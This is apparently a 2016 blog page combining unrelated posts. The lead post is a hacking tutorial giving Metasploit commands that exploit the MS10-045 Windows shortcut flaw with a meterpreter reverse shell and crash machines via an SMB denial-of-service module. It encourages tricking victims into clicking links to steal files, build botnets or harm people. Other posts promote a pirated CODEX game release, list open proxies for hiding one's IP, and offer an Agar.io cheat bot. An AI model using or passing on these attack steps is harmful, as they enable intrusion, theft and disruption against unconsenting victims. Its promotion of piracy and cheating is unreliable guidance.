Sunday 7 February 2016

Hack or crash windows 7 with a simple shortcut file


Welcome to another Hacking Tutorial by MeshCollider.

If you are interested, here are links to my other hacking tutorials:

Spoiler (Click to View)

In this tutorial, I will show you how to use a simple shortcut file to crack a windows 7 computer.

Windows 7 is now the most popular OS for desktop and laptop computers, especially now that XP is no longer going to be supported by Microsoft. 
Cracking into a computer can be useful for a number of reasons: it can give you access to the rest of the network, you can use it as a proxy to hide your IP, you can steal valuable files/details, you can use it as part of a botnet to DOS, etc, and more.

The operating system itself has become quite secure, but numerous vulnerabilities can still be found in other programs installed like the browser, adobe reader, and office. Some other methods are covered in my other tutorials. The vulnerability we will exploit is one found in the way windows 7 handles shortcut files. You will notice that this tutorial is quite similar to there previous tutorials in my series. Lets begin.

1) Open Metasploit
You should be able to do this by yourself by now.

2) Select the Exploit
Microsoft has identified this vulnerability as MS10-045, it takes advantage of a buffer overflow in the shortcut dll. Use this command in Metasploit to load the exploit:

Code:
msf > use windows/ms10_045_shortcut_icon_dllloader

3) Configure the Exploit Options
The first option to set is the payload, and as before, we will use the meterpreter. this is an amazingly powerful payload which we can use to completely own their box.

Code:
set PAYLOAD windows/meterpreter/reverse_tcp
Then we need to set the LHOST, which is the IP of our (the attackers) computer:
Code:
set LHOST 192.168.1.111

4) Run the exploit
As usual, just use the command:

Code:
exploit
And this will generate a link and a server to host that link.
Now we need the victim to click the malicious link!

5) Send the Link to the Victim
This will require a bit of social engineering to convince the user to click the link. Be creative, tell them it is the latest movie download site or the password to a locked RAR file. When the victim clicks the link, their security settings will probably prompt them to allow or deny the webpage access to windows explorer, and they must click allow.
When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. It may not even work, but be patient and hope it does Smile

We will now have control of their computer through the meterpreter installed on their machine. Now you can go ahead and do almost anything you like! In previous tutorials i covered how to download files and view the webcam/microphone, but the fun doesn't have to stop there!

EXTRA: Crashing their computer



This exploit takes advantage of a vulnerability in Windows 7 and Windows Server 2008. We can create an infinite loop and crash the system - not as useful/fun as owning the system - but it can be very destructive/annoying for someone you dont like Smile

1) Run metasploit, load the appropriate exploit using this command:

Code:
msf> use auxiliary/dos/windows/smb/ms10_negotiate_response_loop

2) Set the required options.

Code:
msf> auxiliary(ms10_negotiate_response_loop) show options
As you can see, the only required option is the SVRHOST which is our attacking computer's IP address. Set this option like this:
Code:
msf > auxiliary(ms10_negotiate_response_loop) set SVRHOST 192.168.1.8

3) Run the exploit!
Step 2 generates a shared folder at "\\192.168.1.8\Shared\Anything", we then use this command:

Code:
msf > auxiliary(ms10_negotiate_response_loop) run
When the victim clicks on the link we send them, their computer will freeze and crash.
Use social engineering methods as above to get the victim to click the link. Good Luck!

Read More »
Read More

Agatha Christie The ABC Murders - CODEX


Game Release : Agatha.Christie.The.ABC.Murders-CODEX
Platform : Windows PC
Genre : Adventure
Developer : Microids, Artefacts Studios
Publisher : Gravity Europe SAS
Release : Feb 04, 2016
File Size : 1.04 GB



Quote:
Your weapon is your knowledge. Your wits will be put to the ultimate test!
The ABC Murders is an adventure and investigation game adapted from the classic Agatha Christie novel. The player embodies the famous Hercule Poirot in a 3rd person perspective adventure game packed with mysteries. Once again, the private detective will find himself up against a mysterious opponent who goes by the name of "ABC".
Your intelligence will never have been so challenged!
You will have to explore many crime scenes in various cities set in beautiful surroundings across the United Kingdom. Leave no stone unturned when it comes to cross examinations and deadly puzzles! Observe, question and explore everything possible in order to make the smartest deductions and understand the murderer’s plans!

Features
# Examinations - The player can collect information by examining suspects and paying attention to what they say, how they say it and how they feel.
# Puzzles - The player will have to solve puzzles in order to obtain more clues.
# Brain Deductions - Depending on the clues collected, the player will be able to make deductions and find out more about the murderer.
# Timeline - As the player draws conclusions and progresses through the story, he can use Poirot's Timeline. This means that Hercule Poirot can build a timeline with all the relevant events revealed during the investigation.

Recommended System Requirements
OS : Windows XP/Vista/7/8/10
Processor : AMD / Intel Dual-Core processor running at 3.0 GHz
Memory : 3072 MB RAM
Graphics : ATI/NVIDIA dedicated or mobile graphic card with at least 1GB of dedicated VRAM and with at least Shader Model 4.0 support
DirectX : Version 9.0c
Sound Card : Integrated or dedicated DirectX 9.0c compatible soundcard

More Info :More Info :
Code: Select All
http://store.steampowered.com/app/374900/
NFO :
Code: Select All
http://paste2.org/WDwh79vk
Installation Note : See NFO








DOWNLOAD LINKS
Read More »
Read More

Friday 5 February 2016

Remix OS for PC (Android On PC)

Remix OS is a computer operating system for personal computers. It is based on the Android operating system, and allows users to run Android applications on a PC.[1][2] It was developed by Jide Technology, who announced in January 2016 that it would be made available at no cost.[3] Jide makes individual computers running the Remix OS, but a version of Remix OS Alpha for the PC is also available.









Installing Remix OS On PC

Download Remix OS for PC package and then unzip the file.
(Use WinRAR to unzip it )
Insert pen drive to your PC.
Open Remix os USB tool click on browse.
Now browse the .iso file that we extracted from the zip file.
Click on ok
Click on Reboot your PC.
Press F12(PC)Or F2 while booting and enter Boot Menu.
Select USB HDD or Usb pen drive option.
Select "Guest Mode" or "Resident Mode" to start Remix OS.


USB TOOL http://sh.st/QOEiA

Officiel Link http://sh.st/QOEaZ

Review of Remix OS.
After using remix os for almost 1 day here is what I have to say.
Remix is super fast, smooth one of the best android experience on pc.
As remix os is an alpha stage.There are some things which are not working.
Screen recording apps are not working.
Some games like Clash of clans , Talking cat are not working.
Crashes sometimes on load.
 


Steps to Install Remix OS:

1. The first step is to download the ISO file of Remix OS from their website. This download includes the ISO file and also the USB installer file for creating bootable USB. Once downloaded extract the files.
2. In the next step, you need to prepare the USB pen drive for installation. Now, right click on the pen drive and select format. You need to format it in FAT32.
3. Once the format is completed, run the Remix OS USB tool which you have downloaded in step 1. Select the ISO file in the app and also the USB disk. Now click OK.




This will start the installation process in the USB drive.



4. Once the installation is complete, you need to reboot your PC and then select USB as the booting option from the BIOS 



5. Each PC has different BIOS settings, so you need to check on how to change the boot order of your PC and then select the USB drive as the first boot device. Also, you will need to enable Legacy boot on your PC to boot Remix OS. Once you have enabled this, the PC will boot from the USB drive.
6. Now the installation of Remix OS will start and you will have the option to boot as a guest mode where your sessions are not saved or create a resident mode where all data will be saved. It is better to use the resident mode..




7. In the next step, the installer will create a partition and install the OS and this will take some time depending on your PC. Once the installation is complete, you will be asked to finalize it. Enter your language, accept the user agreement and finally set up the Wi-Fi. Now you are ready to go with Remix OS.












Have Funn... :)
Read More »
Read More

Tuesday 2 February 2016

Proxy List Working Fasssssssssst!!!

110.53.5.250:8000
183.207.228.2:80
37.228.107.253:80
104.202.117.20:80
120.52.73.142:8080
58.177.183.104:80
195.68.136.242:80
124.146.216.197:80
59.49.145.151:3128
101.51.128.52:8080
121.199.60.48:80
111.47.13.2:80
120.198.231.87:80
200.86.219.33:80
117.164.221.95:8123
112.16.87.77:80
120.198.231.85:82
85.198.103.91:8080
74.127.28.24:80
162.243.9.201:3128
203.195.172.147:8080
188.43.123.20:3128
202.29.97.2:3128
137.135.166.225:8121
74.118.186.244:80
120.52.73.23:8081
124.251.38.76:80
223.19.212.30:80
104.202.117.164:80
209.197.86.217:80
173.201.2.45:80
111.14.40.149:80
149.154.64.225:80
118.97.186.220:80
203.81.89.209:80
186.216.161.194:3128
124.115.211.30:9797
89.31.143.4:80
104.202.117.118:80
111.1.61.37:80
124.192.221.240:3128
61.158.173.14:8080
117.136.234.12:843
120.52.73.32:8080
124.251.38.75:80
111.47.13.3:8000
120.198.231.21:80
61.179.110.8:8081
117.177.250.155:85
178.23.244.181:80
195.73.125.49:80
203.71.220.140:80
112.26.204.86:81
111.1.89.254:8000
185.128.36.39:80
168.63.24.174:8146
66.39.5.214:80
185.128.36.32:80
185.4.83.203:1935
103.253.25.198:8080
216.100.93.172:8080
117.177.250.155:80
183.223.24.122:8000
123.162.182.71:8000
104.238.83.28:443
95.6.100.127:8080
120.198.231.87:86
121.69.45.162:8118
112.26.168.46:81
122.96.59.107:80
115.31.183.94:80
117.165.196.98:8123
209.160.43.35:80
203.91.121.76:3128
174.143.210.216:80
111.14.40.154:8081
52.25.121.156:80
120.52.73.35:8081
120.52.73.39:92
117.169.66.230:82
118.98.234.128:80
91.241.94.97:80
120.198.231.22:80
85.95.254.241:3128
218.106.96.200:83
152.8.244.29:8080
104.202.117.198:80
217.198.114.16:80
117.177.250.146:8081
104.202.117.161:80
218.106.96.200:81
183.240.192.226:8080
58.252.58.217:8000
117.177.250.148:81
206.78.210.118:8080
117.177.250.148:86
51.254.36.222:3128
112.53.81.186:81
185.128.36.40:80
89.197.17.166:8080
112.16.87.24:8000
112.26.204.87:81
58.20.184.187:8000
186.227.208.162:8081
158.69.206.63:3128
120.52.72.24:80
120.198.231.87:84
124.251.38.77:80
180.250.163.34:8888
120.198.231.88:81
122.225.106.36:80
121.17.1.70:3128
141.0.11.244:80
117.177.250.147:85
86.96.229.123:8888
91.121.91.101:80
122.96.59.107:81
203.162.69.22:3128
88.153.53.65:80
115.88.201.51:3128
185.95.237.216:8080
82.145.208.21:80
202.195.192.197:3128
122.94.23.35:8118
120.52.73.42:8081
115.46.88.61:80
72.159.148.20:80
104.202.117.98:80
161.68.250.186:80
45.32.59.33:8080
185.76.143.42:8080
120.52.73.156:8090
221.208.18.3:81
120.52.72.49:80
112.16.87.160:80
209.197.108.39:80
52.89.84.83:80
31.7.232.102:3128
92.222.237.121:8898
120.198.231.21:81
120.198.231.85:8080
54.94.138.18:80
122.94.164.208:8118
173.201.95.24:80
218.191.30.12:80
195.5.163.209:80
52.58.18.110:8888
117.135.250.134:82
1.207.245.184:80
65.254.5.80:8080
218.106.96.196:82
117.121.242.8:15275
111.2.196.130:8000
94.100.50.54:8080
112.90.72.83:80
66.23.239.54:80
119.1.96.34:80
117.177.250.152:83
221.213.51.82:8090
104.202.117.111:80
141.0.11.47:80
201.48.251.229:3128
117.177.250.155:82
179.61.116.217:80
120.52.73.42:80
54.169.117.224:80
120.52.73.26:80
112.78.142.132:80
111.56.13.152:83
179.61.114.216:80
121.69.33.158:8080
219.238.0.188:3128
117.177.250.154:8081
183.239.167.122:8080
117.177.250.153:86
85.236.173.243:80
120.52.73.41:8080
110.53.5.250:80
37.233.51.103:8080
197.136.59.15:8080
117.177.250.147:80
120.198.231.88:80
192.99.54.41:3128
120.52.73.22:8081
122.225.106.35:80
50.240.46.244:7004
120.194.220.250:8000
124.146.182.14:80
123.57.23.114:3128
120.52.73.24:8086
187.55.177.67:80
218.75.58.140:80
124.146.182.249:80
193.243.158.18:80
112.16.87.77:8000
1.34.70.247:80
122.96.59.107:82
112.16.89.183:80
120.198.231.86:86
201.245.205.229:3128
119.188.115.23:80
180.254.83.23:8080
124.232.147.22:80
104.202.117.116:80
209.197.109.99:80
207.83.200.231:80
124.131.221.142:9797
218.106.96.199:83
122.193.195.188:81
117.121.242.8:18888
117.135.250.138:80
37.187.3.202:80
177.223.218.92:8080
184.168.55.97:80
198.50.197.71:3128
52.89.116.101:80
162.243.32.139:3128
124.192.122.188:3128
46.4.97.194:80
117.165.148.91:8123
112.26.207.19:81
209.243.15.17:8080
112.26.207.96:81
80.93.125.218:80
179.43.128.203:80
209.124.34.27:80
5.196.12.152:3128
120.198.231.88:83
112.53.81.186:80
120.198.231.87:8081
52.71.169.90:80
193.194.69.36:3128
120.52.72.51:80
117.177.250.149:8081
130.14.29.110:80
83.69.106.65:3128
195.16.77.5:80
117.136.234.9:82
119.147.161.55:3128
46.23.68.90:80
202.159.42.246:80
195.60.122.202:80
46.101.113.185:80
37.128.116.34:3128
62.183.223.189:80
117.177.250.147:8081
96.5.28.23:8008
122.193.14.105:80
202.162.197.133:3128
183.111.169.201:3128
122.193.14.109:83
168.9.40.11:8080
120.198.244.29:80
209.197.86.62:80
112.26.132.87:81
193.50.192.37:80
206.19.205.50:80
200.54.110.196:3128
117.177.250.152:81
58.20.248.69:8000
37.59.206.55:80
112.16.87.24:80
58.252.7.125:8000
178.62.247.158:3128
110.52.232.66:8000
120.52.72.68:80
163.177.79.4:8102
89.218.214.106:9090
185.63.189.128:8080
101.255.60.122:80
95.58.63.186:9090
190.63.157.226:8081
91.241.94.12:80
116.31.76.163:3128
124.192.87.16:3128
58.83.174.114:80
45.115.174.251:80
115.238.225.26:80
117.177.250.153:82
80.228.247.141:80
120.198.231.24:8080
181.14.245.194:8000
222.89.167.66:8000
117.169.66.230:83
201.247.110.168:80
51.254.88.52:3128
120.198.231.85:80
104.202.117.168:80
23.239.14.97:80
195.56.172.73:80
120.198.231.85:8081
115.182.83.38:80
118.144.149.200:3128
120.52.73.179:8090
31.222.163.68:80
122.226.182.233:80
195.70.59.88:80
104.236.222.191:3128
124.146.199.197:80
202.91.248.74:80
Read More »
Read More

{BOT} Agar.io working Bot!

I have found a really good bot for Agar.io that still works,although there's alot out there that don't work

Click here to get the Bot

No survey no BS no downloads. All you have to do is

Step 1.
[​IMG]
Select what browser you're using and remove any extensions added like Agar.io Extender.


Step 2.
If on Google Chrome
Install Tampermonkey Extension here

If on Mozila Firefox
Install GreaseMonkey here

If on Opera
Install Tampermonkey Plugin for Opera here
or
Install Violent Monkey Plugin here

If on Android(yes it works on mobile too :grin: )
Please not that this can be buggy and is not officially supported
Install the Dolphin Browser here


Step 3.

To have automatic updating scripts add this 
loader.user.js file
By clicking on the "Raw" buttons to the right of the page.
Now click next.

To have a prompt asking if you want to update each time a update comes out, add these 2 scripts:
Add the bot.user.js file
and add the launcher.user.js file
By clicking on the "Raw" buttons to the right of the page.




Step 4. Play Agar.io
Keys
  • Press 'R' if you want to toggle the line and dot drawing.

  • Press 'T' if you want to use the manual controls.

  • Press 'D' to toggle the dark mode.

  • Press 'F' to toggle the show mass option.

  • Press 'ESC' for the option menu.

To change your name and other settings, simply press the Esc key on your keyboard to access the menu
.

PLAY AGARIO(Direct Link)
Read More »
Read More